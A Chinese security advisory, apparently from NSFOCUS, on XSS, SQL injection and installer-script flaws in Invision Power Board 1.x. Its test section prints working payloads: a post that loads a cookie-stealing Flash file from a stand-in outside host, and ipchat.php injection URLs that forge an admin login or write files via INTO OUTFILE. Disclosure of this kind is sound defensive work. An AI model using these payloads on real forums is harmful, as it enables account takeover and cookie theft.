首页 -> 安全研究

安全研究

安全漏洞
Invision Power Board多个安全漏洞

发布日期:2003-07-11
更新日期:2003-07-17

受影响系统:
Invision PS Invision Board 1.1.2
Invision PS Invision Board 1.1.1
Invision PS Invision Board 1.0.1
Invision PS Invision Board 1.0
描述:
BUGTRAQ  ID: 8165

Invision Power Board是一款强大的广泛流行的WEB公告版系统。

Invision Power Board由于对用户输入缺少充分过滤,远程攻击者可以利用这个漏洞进行SQL注入,HTML注入等多种攻击。

具体漏洞如下:

1、跨站脚本执行攻击:

问题存在于post.php中,通过在POST文本域中使用[FLASH=h,w][/FLASH]标记,可导致执行任意脚本,可导致COOKIE被窃取。

2、SQL注入:

ipchat.php存在SQL注入问题,根据mysql版本或文件权限问题可能更改SQL查询结构。

3、管理员问题
如果由于部分原因,如权限和目录移动,installer-lockfile(install.lock)文件丢失的情况下,任意用户就可以使用"sm_install.php"脚本,一旦成为管理员,就可以执行如下操作:

1. 通过"admin.php/act=mysql/code=runsql/query=sq"执行任意SQL查询。
2. 上传任意文件,包括程序和脚本到"emoticons"目录。

<*来源:Martin Eiszner (security@freefly.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105795056510504&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Martin Eiszner (security@freefly.com)提供了如下测试方法:

- 跨站脚本问题:

---*---
hey dude, whats up?
[FLASH=2,2]http://anotherhost.ext/cookie-thief.swf[/FLASH]
cu,
jonnie
---*---


- SQL注入问题:

EXAMPLE(mySql > 4):
---*---
http://localhost/ibo/ipchat.php?password=1&username=9x%2527+union+select+%25271%2527,%2527c4ca4238a0b923820dcc509a6f75849b%2527,%2527admin%2527,1%252f*+
---*---

EXAMPLE(with file-permission set):
---*---
http://localhost/ibo/ipchat.php?password=1&username=admin%2527into+outfile+%2527[fullpath]%2527--+
---*---

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在"conf_global.php"中关闭FLASH标记使用可防止跨站脚本问题。

厂商补丁:

Invision PS
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.invisionboard.com/

浏览次数:3576
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障